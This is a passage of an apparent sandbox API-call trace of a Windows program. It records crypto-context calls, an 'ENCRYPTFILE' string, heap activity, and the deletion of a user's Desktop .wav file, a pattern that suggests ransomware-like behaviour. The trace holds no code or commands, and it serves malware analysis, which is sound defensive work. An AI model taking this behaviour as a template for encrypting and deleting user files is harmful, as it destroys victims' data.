CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0118.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.417] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0118.417] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0118.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0118.417] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796fc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0118.417] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0118.417] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0118.417] FreeLibrary (hLibModule=0x756e0000) returned 1 [0118.417] CloseHandle (hObject=0x258) returned 1 [0118.417] CloseHandle (hObject=0x2a0) returned 1 [0118.431] TranslateMessage (lpMsg=0x144f2dc) returned 0 [0118.431] DispatchMessageW (lpMsg=0x144f2dc) returned 0x0 [0118.431] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0118.431] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0118.431] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0118.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0118.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0118.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0118.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0118.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0118.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0118.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0118.431] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0118.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0118.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0118.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923e8 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf388 | out: hHeap=0x1780000) returned 1 [0118.433] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf428 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43595f0 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.434] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf450 | out: hHeap=0x1780000) returned 1 [0118.434] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0118.434] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0118.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22c0 [0118.435] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav", lpFilePart=0x0) returned 0x27 [0118.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0118.435] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\1ytxnppgwwg.wav")) returned 0x20 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0118.435] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0118.435] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0118.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392618 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0118.436] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920a0 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf658 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392618 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0118.436] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0118.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a8072b0, ftCreationTime.dwHighDateTime=0x1d5e2a8, ftLastAccessTime.dwLowDateTime=0xe074f000, ftLastAccessTime.dwHighDateTime=0x1d5ec4b, ftLastWriteTime.dwLowDateTime=0xe074f000, ftLastWriteTime.dwHighDateTime=0x1d5ec4b, nFileSizeHigh=0x0, nFileSizeLow=0x158aa, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="1YTxNPPGwWg.wav", cAlternateFileName="1YTXNP~1.WAV")) returned 0x41ac200 [0118.436] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\1YTxNPPGwWg.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\1ytxnppgwwg.wav")) returned 1 [0118.472] FindNextFileW (in: hFindFile=0x41ac200, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a8072b0, ftCreationTime.dwHighDateTime=0x1d5e2a8, ftLastAccessTime.dwLowDateTime=0xe074f000, ftLastAccessTime.dwHighDateTime=0x1d5ec4b, ftLastWriteTime.dwLowDateTime=0xe074f000, ftLastWriteTime.dwHighDateTime=0x1d5ec4b, nFileSizeHigh=0x0, nFileSizeLow=0x158aa, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="1YTxNPPGwWg.wav", cAlternateFileName="1YTXNP~1.WAV")) returned 0 [0118.472] FindClose (in: hFindFile=0x41ac200 | out: hFindFile=0x41ac200) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920a0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369cc0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0118.473] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0118.473] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e60 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x40a7f98 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0118.473] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf630 | out: hHeap=0x1780000) returned 1 [0118.474] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0118.474] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0118.474] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0118.474] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xa0) returned 0x40a7ba8 [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0118.474] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0118.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0118.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9950 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0118.475] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22f0 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e28 [0118.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e28 | out: hHeap=0x1780000) returned 1 [0118.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0118.475] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0118.475] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0118.475] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0118.475] RtlAllocateHeap 